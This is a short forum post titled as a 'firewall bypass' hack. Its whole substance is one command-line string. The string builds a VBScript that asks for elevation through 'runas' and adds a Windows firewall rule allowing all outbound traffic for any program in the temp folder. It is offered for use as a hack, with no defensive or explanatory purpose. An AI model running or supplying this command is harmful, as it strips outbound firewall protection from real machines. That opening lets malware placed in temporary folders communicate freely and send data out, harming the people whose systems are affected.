Install the app
How to install the app on iOS

Follow along with the video below to see how to install our site as a web app on your home screen.

Note: This feature may not be available in some browsers.

  • Donate
    TheWindowsForum.com needs donations to stay online!
    Love TheWindowsForum.com? Then help keep it alive by sending a donation!

Best Firewall Bypass CMD -Command line- hack

hacxx

VIP
Joined
May 29, 2021
Messages
992
Location
PT
Code:
cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c netsh.exe advfirewall firewall add rule name="rule1" dir=out action=allow protocol=any program=""%temp%\*.*"", , "runas", 1 >>1b.vbs && 1b.vbs
 
Back
Top